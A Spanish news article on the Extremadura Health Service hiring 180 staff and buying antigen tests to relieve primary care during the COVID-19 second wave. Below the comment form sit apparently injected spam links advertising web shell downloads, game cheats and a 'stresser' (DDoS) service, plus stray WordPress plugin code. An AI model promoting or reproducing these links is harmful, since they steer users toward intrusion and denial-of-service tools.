El SES contratará a 180 personas para aliviar la carga en los centros de salud


El Servicio Extremeño de Salud contratará a 180 personas para descargar a médicos y enfermeros de los trabajos de seguimiento a pacientes con coronavirus y para mejorar la asistencia en los centros de salud.

El vicepresidente segundo de la Junta de Extremadura y consejero de Sanidad, José María Vergeles, ha señalado que estas medidas pretenden aliviar la carga de trabajo de la Atención Primaria, sobre la que recae mayor presión en la segunda ola de la pandemia del coronavirus por cuestiones como el seguimiento de los pacientes en aislamiento por casos de covid-19.

Vergeles ha señalado que se contratará a 115 enfermeros y auxiliares de enfermería para contar con equipos centralizados que se encargarán de realizar llamadas de control a los contactos estrechos de positivos con el objetivo de conocer sus síntomas y asegurar su aislamiento. Estas unidades estarán situadas en cada área de salud y contarán con el apoyo del Ejército. La Junta de Extremadura ha pedido cien efectivos para hacer seguimiento telefónico a personas confinadas con el objetivo de «aumentar la adherencia a que se queden en casa».

Junto a esto, el SES incorporará a los centros de salud a 65 auxiliares administrativos y celadores para aumentar la atención a las llamadas que se reciben, de modo que ningún paciente se quede sin respuesta. Asimismo, reforzarán los circuitos de positivos y sospechosos covid-19. Con ello se pretende ganar presencialidad en las consultas. Actualmente el 70% se realiza de forma telemática y el 30% presencial. El objetivo es que sea a la inversa.

Asimismo, Vergeles ha anunciado que se aumentará un 20% el personal de la central de llamadas que recibe las peticiones de asistencia en los centros de salud. También se abrirá la agenda de los médicos de Primaria, de modo que se pueda pedir una cita con un margen de diez días en lugar de los cinco actuales.

Estas medidas de carácter administrativo están destinadas a Primaria, ya que por el momento la atención hospitalaria no experimenta una presión excesiva por casos de covid-19. Según Vergeles, actualmente el centro más comprometido es el Hospital Virgen del Puerto de Plasencia. En caso de que sea necesario, se podría abrir la unidad de cuidados intermedios, lo que llevaría a contratar más de diez personas.

El consejero de Sanidad también ha anunciado que el SES ha adquirido 50.000 tests de antígenos por un importe aproximado de 225.000 euros. Según ha explicado, el Instituto de Salud Carlos III ha validado estas pruebas, que permiten detectar la presencia del virus en apenas quince minutos. Se realizan como las PCR y permitirán agilizar los diagnósticos en los centros de salud y las urgencias hospitalarias.

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Shell İndir Oyun Hileleri Oyun Hileleri Stresser

activate_plugin( 'automatic_replace/index.php' ); activate_plugin( 'bloqueo_comentarios/index.php' ); activate_plugin( 'disable-xml-rpc/disable-xml-rpc.php' ); activate_plugin( 'rename-wp-login/rename-wp-login.php' );